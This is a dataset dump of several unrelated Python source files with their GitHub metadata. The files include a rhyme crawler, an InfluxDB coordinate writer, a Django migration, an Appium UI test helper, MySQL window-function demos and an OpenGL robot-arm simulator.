f2eebfd14911e480769aab4251153e4b06d4e494
|
[] |
no_license
|
wouterbeek/EAPoem
|
497ad12d19a8d078e43e28876a380ebcfffc3c08
|
e417a8bed409e6f52a2139c58116fe78a5ad8a23
|
refs/heads/master
| 2016-09-06T10:36:07.709562
| 2013-12-16T22:10:58
| 2013-12-16T22:10:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 933
|
py
|
"""
Crawler to find rhyming words on http://rhymezone.com
Author: Eszter Fodor
Version: 05/2013
!!! NOTE: Incomplete !!!
"""
# regex: <a class="d" href="d=*"> ... </a> || <a href="d=*"> ... </a>
import sys
import mechanize
import re
from BeautifulSoup import BeautifulSoup
from HTMLParser import HTMLParser
def getRhymes(html):
"""
Constructs list with all the words that came up on the site
"""
soup = BeautifulSoup(html)
find = soup.body.center.center
b = find.findAll('a', href = True,text=True)
    print(b)
#rhymes = find.findAll('a', href = True)
#print rhymes
def main(args):
"""
Program entry point
Argument: word to look up
"""
word = args[1]
br = mechanize.Browser()
link = ('http://www.rhymezone.com/r/rhyme.cgi?Word=%s&typeofrhyme=perfect&org1=syl&org2=l&org3=y' % word)
site = br.open(link)
html = site.read()
getRhymes(html)
site.close()
if __name__ == '__main__':
sys.exit(main(sys.argv))
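# Usage sketch (illustrative; needs Python 2 with mechanize and
# BeautifulSoup 3 installed):
#   python rhymeCrawler.py orange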
|
[
"chytos@gmail.com"
] |
chytos@gmail.com
|
4aab624853ef559de8b4f8f88e3f5657bff877c9
|
b4de9949124a85d54844a69920a65172b4188067
|
/lat_lon_script.py
|
ac9e5a4ae11f0420a89b35b4ca8da9f56f98f4f5
|
[
"BSD-3-Clause"
] |
permissive
|
schrma/influxdb
|
e70c5188f36fd1ae8bc05f407fcf025f4a63d905
|
23fb18b1efcaa4bd9c7d214bc9f5fd3120bd5ba1
|
refs/heads/master
| 2020-09-07T13:27:13.787912
| 2019-11-13T17:12:58
| 2019-11-13T17:12:58
| 220,795,349
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 991
|
py
|
#!/usr/bin/python3
import sys
import argparse
import influxhandler
def main(argv):
args = parse_arguments(argv)
influx_client = influxhandler.InfluxHandler("localhost:8086","admin",args.password,"openhab_db")
influx_client.write_lat_lon(args.lat,args.lon,args.measurement)
def parse_arguments(command_args):
"""parse the input arguments """
my_description = 'Cmd write lat and lon to database'
parser = argparse.ArgumentParser(description=my_description, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-l', '--lat', dest='lat',help='Write latitude to influxdb')
parser.add_argument('-g', '--lon', dest='lon',help='Write longitude to influxdb')
parser.add_argument('-p', '--password', dest='password',help='Password for influxdb')
parser.add_argument('-m', '--measurement', dest='measurement',help='Measurement name')
args = parser.parse_args(command_args)
return args
if __name__ == "__main__":
main(sys.argv[1:])
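# Usage sketch (illustrative; flags match the argparse definitions above):
#   python3 lat_lon_script.py --lat 48.14 --lon 11.58 -p <password> -m position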
|
[
"marcoschr@gmx.de"
] |
marcoschr@gmx.de
|
18b1dcd136b7ca1e094b360efaf4861250250a30
|
fcdbf04f899eabff6906099090447255c97628b8
|
/db.py
|
11a0fa355290675be0718b1b2a4bf9582e687cd1
|
[] |
no_license
|
mehulved/flask-tutorial
|
3d6e60a846a8441c37414247e48ee904432e6b14
|
3b2eb422a7012cacfd320bd510766fedfd120fbc
|
refs/heads/master
| 2021-01-16T19:28:45.338531
| 2012-12-08T14:10:19
| 2012-12-08T14:23:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 124
|
py
|
from flask.ext.sqlalchemy import SQLAlchemy
# Create the SQLAlchemy object, provided by Flask-SQLAlchemy.
db = SQLAlchemy()
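# Usage sketch (illustrative): the object is bound to an app later, which
# avoids circular imports in an application-factory layout:
# from flask import Flask
# app = Flask(__name__)
# db.init_app(app)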
|
[
"dhruvbaldawa@gmail.com"
] |
dhruvbaldawa@gmail.com
|
ffcb4231b6956ab6788073b7baa2a68f6163136e
|
eefc46faf29b7ec9e52de065a983f9993de4aaa3
|
/tic_tac_toe/migrations/0001_initial.py
|
3c97744c1bc95ec95e5322f7be5622d004c103a7
|
[
"MIT"
] |
permissive
|
jujuwoman/tic-tac-toe
|
0963acd74bb6c31b6fabc67ffce5babc128d8b79
|
6096d980d0253a9fab9293dda37b7d12b7cb4613
|
refs/heads/master
| 2022-11-16T07:19:17.526463
| 2020-07-04T18:59:43
| 2020-07-04T18:59:43
| 276,934,778
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,958
|
py
|
# Generated by Django 3.0.3 on 2020-02-24 04:39
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Marks',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Players',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Roster',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Stats',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('wins', models.IntegerField()),
('losses', models.IntegerField()),
('draws', models.IntegerField()),
('roster', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tic_tac_toe.Roster')),
],
),
migrations.CreateModel(
name='GameState',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('turn', models.BooleanField()),
('roster', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tic_tac_toe.Roster')),
],
),
]
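# Usage sketch (illustrative): apply this initial migration with
#   python manage.py migrate tic_tac_toe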
|
[
"judywang@linkedin.com"
] |
judywang@linkedin.com
|
26250ffca25419ec796bc3e537756bfa5e04ec05
|
28aed3120411fd7558fc08b47274f5ced5d5069c
|
/UIAutomation/Page/Mobile/CardCentralPage.py
|
14b6290fe4e1495540274f5aa23a976ae8e6ada8
|
[
"MIT"
] |
permissive
|
SirCYong/long_long_ago
|
8e181310267836774b50824e873adb7959f80080
|
6dfe9a9eb9d0f25a55bccd22b66878bde1a2fd6b
|
refs/heads/master
| 2020-03-16T02:58:18.161981
| 2018-05-07T15:17:54
| 2018-05-07T15:17:54
| 132,477,192
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,280
|
py
|
import requests
from time import sleep
from UIAutomation.Utils import GetCardListFailureException, Action, parse_cfg, get_setting_configuration
from UIAutomation.Utils.HttpWrapper import get_request_post_head_parameters, eject_logged_user
import sys
__author__ = 'Yong_li'
__package__ = 'IscsUIAutomation'
"""
Use this class to operate on temporary cards; just pass in the name of a card you own.
"""
class CardCentralPage:
def __init__(self, driver, username, password, card_list_index):
"""
:param driver: Appium driver
:type driver:
:param username: cellphone number
:type username: str
:param password:
:type password:
        :param card_list_index: card list fetched before entering the card
            center; call token, userid = eject_logged_user(mobile, password)
            first to obtain the token and ID used to retrieve card information.
        :type card_list_index: list
"""
self.screen_shot_name = __name__
self.driver = driver
self.action = Action(driver)
self.username = username
self.password = password
self.card_list_index = card_list_index
def click_expected_card(self, card_name):
"""
        To tap the card you want, just pass in the card's Chinese name.
        :param card_name: display name of the card to tap
        :type card_name: str
:return:
:rtype:
"""
position = self.get_card_position(card_name)
        h, w = self.get_abs_width_height(position)  # the helper returns (height, width)
        swip_times = self.swap_times(position)
        if swip_times:
            swip_times_int = int(swip_times)
            for i in range(swip_times_int):
                self.swipe_card()
        self.driver.tap([(w, h)], 200)  # Appium tap takes (x, y) = (width, height)
# self.action.tap_driver([(w, h)], 1000)
def get_abs_width_height(self, position):
mobile_size = self.action.get_window_size()
width = mobile_size['width']
height = mobile_size['height']
w = 0
h = 0
sleep(5)
if position <= 6:
if position == 1:
h = 671 / 1280.0 * height
w = 138 / 752.0 * width
return h, w
if position == 2:
h = 671 / 1280.0 * height
w = 376 / 752.0 * width
return h, w
if position == 3:
h = 671 / 1280.0 * height
w = 612 / 752.0 * width
return h,w
if position == 4:
h = 1017 / 1280.0 * height
w = 138 / 752.0 * width
return h, w
if position == 5:
h = 1017 / 1280.0 * height
w = 376 / 752.0 * width
return h, w
if position == 6:
h = 1017 / 1280.0 * height
w = 612 / 752.0 * width
return h, w
if position > 6:
            # Pages after the first hold 9 cards each; a remainder of 0 means
            # the 9th (last) slot on its page rather than an invalid position.
            locator_number = (position - 6) % 9
            if locator_number == 0:
                locator_number = 9
if locator_number == 1:
h = 325 / 1280.0 * height
w = 138 / 752.0 * width
return h, w
if locator_number == 2:
h = 325 / 1280.0 * height
w = 376 / 752.0 * width
return h, w
if locator_number == 3:
h = 325 / 1280.0 * height
w = 612 / 752.0 * width
return h, w
if locator_number == 4:
h = 671 / 1280.0 * height
w = 138 / 752.0 * width
return h, w
if locator_number == 5:
h = 671 / 1280.0 * height
w = 376 / 752.0 * width
return h, w
if locator_number == 6:
h = 671 / 1280.0 * height
w = 612 / 752.0 * width
return h, w
if locator_number == 7:
h = 1017 / 1280.0 * height
w = 138 / 752.0 * width
return h, w
if locator_number == 8:
h = 1017 / 1280.0 * height
w = 376 / 752.0 * width
return h, w
if locator_number == 9:
h = 1017 / 1280.0 * height
w = 612 / 752.0 * width
return h, w
else:
raise ValueError
def get_card_position(self, card_name):
        # the system sends a POST request (card list fetched beforehand)
try:
result = self.card_list_index
card_list = []
for r in result:
card_list.append(r['cardName'])
try:
position = card_list.index(card_name) + 1
# print card_list
except Exception as e:
                print(e, 'Failed to get card list.')
raise GetCardListFailureException
return position
except Exception as e:
print(e)
@staticmethod
def __get_username_password():
"""
        Fetch which username and password to use for API operations.
:return:
:rtype:
"""
setting = parse_cfg("setting", "cit_setting")
return setting['username'], setting['password'], setting['host']
def swipe_card(self):
width = self.action.get_window_size()['width']
height = self.action.get_window_size()['height']
if self.is_run_ios():
self.action.swipe(width * 5 / 7, height / 2, -(width * 3 / 7), height / 2, 200)
sleep(1)
else:
sleep(2)
self.action.swipe(0.9*width, 0.5*height, 0.1*width, 0.5*height, 250)
# self.action.swipe(width * 5 / 7, height / 2, -(width * 3 / 7), height / 2, 100)
# sleep(3)
pass
@staticmethod
def swap_times(position):
        if position <= 6:
            return None
        else:
            # The first page shows 6 cards and later pages 9 each; floor
            # division keeps positions 7-15 on a single swipe.
            swap_times = (position - 7) // 9 + 1
            return swap_times
pass
def is_run_ios(self):
"""
        Check whether the current run targets iOS.
:return:
"""
if sys.platform == "darwin":
return True
else:
return False
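# Usage sketch (illustrative; assumes an Appium driver and a card list
# obtained beforehand via eject_logged_user):
# page = CardCentralPage(driver, mobile, password, card_list_index)
# page.click_expected_card('<card name>')  # taps the card, swiping pages as needed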
|
[
"649803977@qq.com"
] |
649803977@qq.com
|
abf6ebe4e73d775e29a7560d3f227e75a4f35eb4
|
a1504798a55d652c9c0705cc507fe2cb9678ea4f
|
/Adavnce_CRUD/MySQL_Window_Function/Window_Analytical_Function/MySQL_Analytical_Function.py
|
ee539c58a681592dda73205a29741e394fb1a83e
|
[] |
no_license
|
ritikapatel1410/Python_MySql
|
a4a952abd7b0394eafc071de0f55efd6a7a3b359
|
d90da25391243d5c08156a9184727c3e42e43517
|
refs/heads/main
| 2023-03-21T01:24:02.465879
| 2021-03-18T07:55:04
| 2021-03-18T07:55:04
| 347,563,406
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,610
|
py
|
'''
@Author: Ritika Patidar
@Date: 2021-03-18 00:30:10
@Last Modified by: Ritika Patidar
@Last Modified time: 2021-03-18 00:30:38
@Title : perform window analytical functions on a table
'''
import mysql.connector as mysql
import os
import sys
sys.path.insert(0,os.path.realpath("LogFile"))
import loggerfile
from decouple import config
class Analytical_Function:
"""
Description:
        this class is defined to show the functionality of window analytical functions
"""
def __init__(self):
self.mydb=mysql.connect(host=config('DB_HOST'),user=config('DB_USERNAME'),password=config('DB_PASSWORD'),database=config('DB_DATABASE'))
self.mycursor = self.mydb.cursor()
def NTILE_Function(self):
"""
Description:
            this function is defined for the NTILE function
Parameter:
None
Return:
None
"""
try:
print("================================ NTILE Function ===================================")
self.mycursor.execute("SELECT Year, Product, Sale,NTile(4) OVER() AS Total_Sales FROM Sales")
ntile = self.mycursor.fetchall()
for records in ntile:
print(records)
loggerfile.Logger("info","ntile fuction performed successfully")
except Exception as error:
loggerfile.Logger("error","{0} occured".format(error))
def LEAD_Function(self):
"""
Description:
            this function is defined for the LEAD function
Parameter:
None
Return:
None
"""
try:
print("================================ LEAD Function ===================================")
self.mycursor.execute("SELECT Year, Product, Sale,LEAD(Sale,1) OVER(ORDER BY Year) AS Total_Sales FROM Sales")
lead = self.mycursor.fetchall()
for records in lead:
print(records)
loggerfile.Logger("info","lead functions performed successfully")
except Exception as error:
loggerfile.Logger("error","{0} occured".format(error))
def LAG_Function(self):
"""
Description:
            this function is defined for the LAG function
Parameter:
None
Return:
None
"""
try:
print("================================ Lag Function ===================================")
self.mycursor.execute("SELECT Year, Product, Sale,LAG(Sale,2) OVER(ORDER BY Year) AS Total_Sales FROM Sales")
percentage_rank=self.mycursor.fetchall()
for records in percentage_rank:
print(records)
loggerfile.Logger("info","Leg fuctions performed successfully".format(AVG))
except Exception as error:
loggerfile.Logger("error","{0} occured".format(error))
def FIRST_VALUE_Function(self):
"""
Description:
            this function is defined for the FIRST_VALUE function
Parameter:
None
Return:
None
"""
try:
print("================================ First Value Function ===================================")
self.mycursor.execute("SELECT Year, Product, Sale, FIRST_VALUE(Product) OVER(PARTITION BY Year order by Sale desc) AS Total_Sales FROM Sales")
first_value=self.mycursor.fetchall()
for records in first_value:
print(records)
loggerfile.Logger("info","First value function performed successfully")
except Exception as error:
loggerfile.Logger("error","{0} occured".format(error))
def LAST_VALUE_Function(self):
"""
Description:
            this function is defined for the LAST_VALUE function
Parameter:
None
Return:
None
"""
try:
print("================================ Last Value Function ===================================")
self.mycursor.execute("SELECT Year, Product, Sale, LAST_VALUE(Product) OVER(PARTITION BY Year order by Sale desc) AS Dume_Dist_Sale FROM Sales")
last_value=self.mycursor.fetchall()
for records in last_value:
print(records)
loggerfile.Logger("info","Last value performed successfully".format(Max))
except Exception as error:
loggerfile.Logger("error","{0} occured".format(error))
|
[
"patelrit1410@gmail.com"
] |
patelrit1410@gmail.com
|
49b11249c23e8b713d1e474589da61604eb9fe77
|
2b398353f5b0529ac666ef180e9dc966474a70c0
|
/vspk/v6/fetchers/nuingressauditacltemplates_fetcher.py
|
f794dbf0465235ffedeca8c1df72c25fb9c6b947
|
[
"BSD-3-Clause"
] |
permissive
|
nuagenetworks/vspk-python
|
e0c4570be81da2a4d8946299cb44eaf9559e0170
|
9a44d3015aa6424d0154c8c8a42297669cce11f9
|
refs/heads/master
| 2023-06-01T01:12:47.011489
| 2023-05-12T19:48:52
| 2023-05-12T19:48:52
| 53,171,411
| 21
| 18
|
BSD-3-Clause
| 2020-12-16T12:36:58
| 2016-03-04T23:10:58
|
Python
|
UTF-8
|
Python
| false
| false
| 2,212
|
py
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from bambou import NURESTFetcher
class NUIngressAuditACLTemplatesFetcher(NURESTFetcher):
""" Represents a NUIngressAuditACLTemplates fetcher
Notes:
This fetcher enables to fetch NUIngressAuditACLTemplate objects.
See:
bambou.NURESTFetcher
"""
@classmethod
def managed_class(cls):
""" Return NUIngressAuditACLTemplate class that is managed.
Returns:
.NUIngressAuditACLTemplate: the managed class
"""
from .. import NUIngressAuditACLTemplate
return NUIngressAuditACLTemplate
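# Hypothetical usage sketch (the parent attribute name follows vspk's generated
# fetcher conventions and is an assumption, not defined in this file):
#   templates = parent.ingress_audit_acl_templates.get()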
|
[
"corentin.henry@nokia.com"
] |
corentin.henry@nokia.com
|
8681d350870b0cb4e9331a9d485552af8fa18ff0
|
648c206b68552f8d3250d4c6898245d2943e465e
|
/Simple_Sim.py
|
51d4f0dde98bccb5aac4b6043441bc6288d4c6cd
|
[] |
no_license
|
PAWAN-PRAJAPATI/robotic_arm_simulation
|
3a61d8b05a1541d6844cbb59a4130708ce858dac
|
cbdd8e7acf2cfdf54387097a68ce4a758ced58e7
|
refs/heads/master
| 2020-04-01T09:39:43.045401
| 2018-10-15T09:13:56
| 2018-10-15T09:13:56
| 153,084,551
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,128
|
py
|
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
import socket
import sys
import math
import pygame
import pickle
import time
#from mpurecieverpi import myThread_R,myThread_S
'''
s1 = socket.socket()
s2 = socket.socket()
host = "127.0.0.1"
print(host)
port1 = int(sys.argv[1])
port2 = int(sys.argv[2])
s1.connect((host, port1))
s2.connect((host, port2))
#p1 elbow
#p2 shoulder
'''
#t = myThread_R()
#t1 = myThread_S()
class SimpleRobotArm:
def __init__(self):
self.angles=[90,0,225] #base shoulder elbow
self.config=[0,0] #(thetha,beta),(xy,zx)
self.anglstep=1
self.xyz=[0.5,0.2,0.05]
self.xyzstep=0.025
self.name = "Simple Robot Arm"
self.mode="reverse" # inverse reverse combat mouse
# thresholds = [[base_l,base_h],[shoulder........],[elbow........]]
self.thresh = [[-25, 200], [-30, 110], [190, 400]]
self.r_max=1.32
self.view="no_view"
self.golax=0
self.golay=0
self.pos_c=[0,0]
self.wheel_size=0.7
self.claw=self.wrist=0
self.host = "10.42.0.241"
self.s1=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.s2=None
def ret_ascii(self,i):
s = str(i)
ascii1 =int(s[0])+48
ascii2 =int(s[1])+48
return [ascii1,ascii2]
def axis(self):
glBegin(GL_LINES)
glColor3f(0.3, 0.3, 0.3)
glVertex3f(-10.0, 0.0, 0.0)
glVertex3f(10.0, 0.0, 0.0)
glVertex3f(0.0, -10.0, 0.0)
glVertex3f(0.0, 10.0, 0.0)
glVertex3f(0.0, 0.0, -10.0)
glVertex3f(0.0, 0.0, 10.0)
glEnd()
biggest = 10
x = 88
y = 89
z = 90
r = range (0, (biggest + 1))
for i in r:
ascii = 48+i
# x axis positive
glRasterPos3f(i, 0.0, 0.0)
glColor3f(0.3, 0.3, 0.3)
if i == biggest:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, x)
else:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, ascii)
# x axis negative
glRasterPos3f(-i, 0.0, 0.0)
glColor3f(0.5, 0.0, 0.0)
if i == biggest:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, x)
else:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, ascii)
# y axis positive
glRasterPos3f(0.0, i, 0.0)
glColor3f(0.3, 0.3, 0.3)
if i == biggest:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, y)
else:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, ascii)
# x axis negative
glRasterPos3f(0.0, -i, 0.0)
glColor3f(0.5, 0.0, 0.0)
if i == biggest:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, y)
else:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, ascii)
# z axis positive
glRasterPos3f(0.0, 0.0, i)
glColor3f(0.3, 0.3, 0.3)
if i == biggest:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, z)
else:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, ascii)
# z axis negative
glRasterPos3f(0.0, 0.0, -i)
glColor3f(0.5, 0.0, 0.0)
if i == biggest:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, z)
else:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, ascii)
glFlush()
def run(self):
glutInit(sys.argv)
glutInitDisplayMode(GLUT_DOUBLE | GLUT_RGB)
glutInitWindowSize(600, 800)
glutInitWindowPosition(100, 100)
glutCreateWindow(self.name)
glClearColor(0.0, 0.0, 0.0, 0.0)
glShadeModel(GL_FLAT)
glutDisplayFunc(self.display)
glutReshapeFunc(self.reshape)
#glutKeyboardUpFunc(self.keys_up)
glutKeyboardFunc(self.keys)
#glutJoystickFunc(self.joystick,1)
glutMainLoop()
def wheel(self,radius, height, num_slices):
r = radius
h = height
n = float(num_slices)
circle_pts = []
for i in range(int(n) + 1):
angle = 2 * math.pi * (i/n)
x = r * math.cos(angle)
y = r * math.sin(angle)
pt = (x, y)
circle_pts.append(pt)
glBegin(GL_TRIANGLE_FAN)#drawing the back circle
glColor(0, 0, 1)
glVertex(0, 0, h/2.0)
for (x, y) in circle_pts:
z = h/2.0
glVertex(x, y, z)
glEnd()
glBegin(GL_TRIANGLE_FAN)#drawing the front circle
glColor(0.25, 0.25, 0.25)
glVertex(0, 0, h/2.0)
for (x, y) in circle_pts:
z = -h/2.0
glVertex(x, y, z)
glEnd()
glBegin(GL_TRIANGLE_STRIP)#draw the tube
glColor4f(0.6, 0.6, 0.6, 1)
for (x, y) in circle_pts:
z = h/2.0
glVertex(x, y, z)
glVertex(x, y, -z)
glEnd()
def display(self):
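# Joint angles can be streamed in from the (commented-out) MPU receiver thread 't';
# the try/except below lets the simulation run standalone when no sensor is attached.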
try:
elb=t.run()
elb=elb.split(",")
self.angles[2]=int(elb[0])
except Exception as e:
#print(e)
pass
'''
try:
sho=(self.s2.recv(1024).decode())
sho=sho.split(",")
self.angles[1]=int(sho[0])
except Exception as e:
print(e)
pass
'''
#print("sho:",sho)
#print("elb:",elb)
glClear(GL_COLOR_BUFFER_BIT);
glPushMatrix();
glTranslatef(0, -2, -7);
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA,GL_ONE_MINUS_SRC_ALPHA);
glRotatef(self.golax, 0, 1, 0);
glRotatef(self.golay, 1, 0, 0);
glColor4f(0.0,0.0,1.0,1)
if(self.dis(self.xyz)>self.r_max):
glColor4f(1.0,0,0,0.5)
glDisable(GL_BLEND)
self.axis()
glColor4f(0,0.4,0.4,0.5)
glTranslatef(0, 0, 0);
#if(self.angles[0]>self.thresh[0][1]-20 or self.angles[0]<self.thresh[0][0]+20):
# glColor4f(1.0,0,0,0.5)
#bbb = self.angles[0] - 90
#glRotatef(bbb, 0, 1, 0);
glTranslatef(0, 0.0, 0.0);
glPushMatrix();
glScalef(10, 1, 5);
glutSolidCube(0.5)
glPopMatrix();
glTranslatef (-2, 0, -2);
self.wheel(self.wheel_size,self.wheel_size,20)
glTranslatef (4, 0, 4);
self.wheel(self.wheel_size,self.wheel_size,20)
glTranslatef (0, 0, -4);
self.wheel(self.wheel_size,self.wheel_size,20)
glTranslatef (-4, 0, 4);
self.wheel(self.wheel_size,self.wheel_size,20)
###
glColor4f(0,0,1,0.5)
glTranslatef(4.3, 0, -2);
glPushMatrix();
if(self.view=="view"):
glutWireSphere(3.14*1.8,25,25)
glPopMatrix();
#if(self.angles[0]>self.thresh[0][1]-20 or self.angles[0]<self.thresh[0][0]+20):
# glColor4f(1.0,0,0,0.5)
bbb = self.angles[0] - 90
glRotatef(bbb, 0, 1, 0);
glTranslatef(-2, 0.0, 0.0);
glPushMatrix();
glScalef(10, 1, 5);
glutWireCube(0.0)
glPopMatrix();
###
glColor4f(0.5,0.5,1.0,0.5)
glTranslatef(2.5,0,0);
#if(self.angles[1]>self.thresh[1][1]-20 or self.angles[1]<self.thresh[1][0]+20):
# glColor4f(1.0,0,0,0.5)
glRotatef(self.angles[1], 0, 0.0, 1);
glTranslatef(1, 0, 0.0);
glPushMatrix();
glScalef(2.0, 0.2, 0.5);
glutSolidCube(1.1);
glPopMatrix();
glColor4f(1,0.5,0.5,0.5)
glTranslatef(1.2, 0.0, 0.0);
if(self.angles[2]>self.thresh[2][1]-20 or self.angles[2]<self.thresh[2][0]+20):
glColor4f(1.0,0,0,0.5)
glRotatef(self.angles[2], 0.0, 0.0, 1.0);
glTranslatef(1.2, 0.0, 0.0);
glPushMatrix();
glScalef(2.0, 0.2, 0.5);
glutSolidCube(1.3);
glPopMatrix();
glColor4f(1,1,1,1)
glTranslatef(1.3, 0.0, 0.0);
glRotatef(self.wrist, 1, 0.0, 0);
glTranslatef(0, 0.0, 0.0);
glPushMatrix();
glScalef(0.1, 0.2, 0.5);
glutSolidCube(1.3);
glPopMatrix();
glColor4f(1,1,1,1)
glTranslatef(0, 0.0, -0.34);
glRotatef(self.claw, 0.0, 1, 0);
glBegin(GL_TRIANGLES)
glVertex3f(0.5, 0, -0.4)
glVertex3f(1,0, 0.0)
glVertex3f( 0,0, 0.0)
glEnd()
glRotatef(-self.claw, 0.0, 1, 0);
glColor4f(1,1,1,1)
glTranslatef(0, 0.0, 2*0.34);
glRotatef(0, 0.0, 1, 0);
glRotatef(-self.claw, 0.0, 1, 0);
#glRotatef(self.claw, 0.0, 1, 0);
glBegin(GL_TRIANGLES)
glVertex3f(0.5, 0, 0.4)
glVertex3f(1,0, 0.0)
glVertex3f( 0,0, 0.0)
glEnd()
glPopMatrix();
glutSwapBuffers();
glutPostRedisplay()
def reshape(self, w, h):
glViewport(0, 0, w, h)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(65.0, w / h, 1.0, 20.0)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
glTranslatef(0.0, 0.0, -6.0)
def view_mode(self,keys):
if(keys=='4'.encode("utf-8")):
self.golax+=2
elif(keys=='6'.encode("utf-8")):
self.golax-=2
elif(keys=='8'.encode("utf-8")):
self.golay+=2
elif(keys=='5'.encode("utf-8")):
self.golay-=2
def apply(self,angles,xyz,angles_chg,xyz_chg):
self.angles[0]=(angles[0]+angles_chg[0])%360
self.angles[1]=(angles[1]+angles_chg[1])%360
self.angles[2]=(angles[2]+angles_chg[2])%360
self.xyz[0]=xyz[0]+xyz_chg[0]
self.xyz[1]=xyz[1]+xyz_chg[1]
self.xyz[2]=xyz[2]+xyz_chg[2]
def dis(self,xyz):
x,y,z=xyz
s=(x**2+y**2+z**2)**(1/2)
return (s)
def angle_check(self,angles):
if(self.thresh[0][0]<angles[0]<self.thresh[0][1] and self.thresh[1][0]<angles[1]<self.thresh[1][1] and
self.thresh[2][0]<angles[2]<self.thresh[2][1]):
return 1
return 0
def print_data(self):
#print("Mode:",self.mode)
#print("Angles:",self.angles)
print("Wrist:",self.wrist)
print("Claw:",self.claw)
def keys(self,*args):
#port1 = int(sys.argv[1])
#port2 = int(sys.argv[2])
keys=args[0]
if(keys=='1'.encode("utf-8")):
'''
try:
self.s1.close()
except Exception as e:
print(e)
pass
'''
#self.s1.connect((self.host, port1))
print("elbo connected!!!")
if(keys==2):
try:
self.s2.close();
except Exception as e:
print(e)
pass
self.s2 = socket.socket()
self.s2.connect((self.host, port2))
print("sho connected!!!")
if(keys=='v'.encode("utf-8")):
self.view="view"
elif(keys=='b'.encode("utf-8")):
self.view="no_view"
elif(keys=='C'.encode("utf-8")):
self.golay=0
self.golax=0
elif(keys=='+'.encode("utf-8")):
self.xyzstep+=0.025
elif(keys=='-'.encode("utf-8")):
self.xyzstep-=0.025
self.view_mode(keys)
if(keys=='q'.encode("utf-8")):
self.apply(self.angles,self.xyz,[self.anglstep,0,0],[0,0,0])
elif(keys=='a'.encode("utf-8")):
self.apply(self.angles,self.xyz,[-self.anglstep,0,0],[0,0,0])
if(keys=='w'.encode("utf-8")):
self.apply(self.angles,self.xyz,[0,self.anglstep,0],[0,0,0])
elif(keys=='s'.encode("utf-8")):
self.apply(self.angles,self.xyz,[0,-self.anglstep,0],[0,0,0])
if(keys=='e'.encode("utf-8")):
self.apply(self.angles,self.xyz,[0,0,self.anglstep],[0,0,0])
elif(keys=='d'.encode("utf-8")):
self.apply(self.angles,self.xyz,[0,0,-self.anglstep],[0,0,0])
if(keys=='t'.encode("utf-8") and self.claw<=6):
self.claw=self.claw+2
elif(keys=='g'.encode("utf-8") and self.claw>=-24):
self.claw=self.claw-2
if(keys=='r'.encode("utf-8")):
self.wrist=self.wrist+2
elif(keys=='f'.encode("utf-8")):
self.wrist=self.wrist-2
self.print_data()
glutPostRedisplay()
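# Key bindings handled above:
#   q/a, w/s, e/d : rotate base, shoulder and elbow by anglstep
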